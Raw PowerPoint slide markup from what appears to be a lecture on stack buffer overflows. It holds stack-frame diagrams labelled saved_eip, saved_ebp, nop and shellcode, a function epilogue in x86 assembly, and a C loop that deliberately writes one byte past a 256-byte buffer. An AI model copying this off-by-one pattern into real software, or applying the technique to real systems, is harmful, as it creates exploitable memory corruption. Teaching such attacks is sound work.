          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1136658" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="531495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ebp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1136659" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="56007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pc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1136660" name="AutoShape 20"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8610600" y="1200150"/>
            <a:ext cx="152400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 66667"/>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36661" name="AutoShape 21"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8610600" y="2114550"/>
            <a:ext cx="152400" cy="2171700"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 158333"/>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36662" name="Rectangle 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="24003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eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>saved_ebp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1136663" name="Text Box 23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="8399861" y="15464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main()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1136664" name="Text Box 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="8399861" y="30323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func()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1136667" name="AutoShape 27"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1136659" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="2260226" y="4272171"/>
            <a:ext cx="4216774" cy="1471404"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1136668" name="AutoShape 28"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1136658" idx="1"/>
            <a:endCxn id="1136662" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="2543175"/>
            <a:ext cx="1588" cy="2914650"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -71000005"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1136669" name="AutoShape 29"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1136657" idx="1"/>
            <a:endCxn id="1136649" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="4143375"/>
            <a:ext cx="1588" cy="1028700"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -14400000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1136670" name="Rectangle 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="42862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i="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>free </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1136671" name="Rectangle 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8001000" y="2400300"/>
            <a:ext cx="533400" cy="285750"/>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5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() Epilogue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Text Box 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="4102894"/>
            <a:ext cx="1912703" cy="338554"/>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dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Text Box 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228602" y="4388644"/>
            <a:ext cx="2378075"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dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>pop %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Times" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="4731544"/>
            <a:ext cx="2362200"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a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Times" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Text Box 32"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="286882" y="2105300"/>
            <a:ext cx="3326552" cy="2086725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sm</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r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[256];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>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for(</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 0;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&lt;= 256;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buffer[</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[</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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2139302979"/>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8693" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="1085850"/>
            <a:ext cx="2057400" cy="3200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1138694" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="26860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&amp;shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1138695" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="29718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shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1138696" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="37147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nop</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1138697" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="40005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int i</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 10"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="7404100" y="3333750"/>
            <a:ext cx="76200" cy="285750"/>
            <a:chOff x="1392" y="2880"/>
            <a:chExt cx="48" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1138699" name="Oval 11"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1392" y="2880"/>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38700" name="Oval 12"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1392" y="2976"/>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38701" name="Oval 13"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1392" y="3072"/>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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1138702" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="21145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saved_eip</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1138703" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="12001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argc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1138704" name="Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="1485900"/>
            <a:ext cx="2057400" cy="6286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argv</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1138705" name="Rectangle 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="50292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esp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1138706" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="531495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ebp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1138707" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="56007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pc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1138708" name="AutoShape 20"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8610600" y="1200150"/>
            <a:ext cx="152400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 66667"/>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38709" name="AutoShape 21"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8610600" y="2114550"/>
            <a:ext cx="152400" cy="2171700"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 158333"/>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38710" name="Rectangle 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="24003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eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>saved_ebp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1138711" name="Text Box 23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="8399861" y="15464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main()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1138712" name="Text Box 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="8399861" y="30323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func()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1138715" name="AutoShape 27"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1138707" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="2606676" y="4557921"/>
            <a:ext cx="3870324" cy="1185654"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1138716" name="AutoShape 28"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1138706" idx="1"/>
            <a:endCxn id="1138710" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="2543175"/>
            <a:ext cx="1588" cy="2914650"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -71000005"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1138717" name="AutoShape 29"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1138705" idx="1"/>
            <a:endCxn id="1138710" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="2543175"/>
            <a:ext cx="1588" cy="2628900"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -36000005"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1138718" name="Rectangle 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="42862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i="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>free </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1138719" name="Rectangle 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8001000" y="2400300"/>
            <a:ext cx="533400" cy="285750"/>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3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() Epilogue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Text Box 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="4102894"/>
            <a:ext cx="1912703" cy="338554"/>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dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Text Box 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
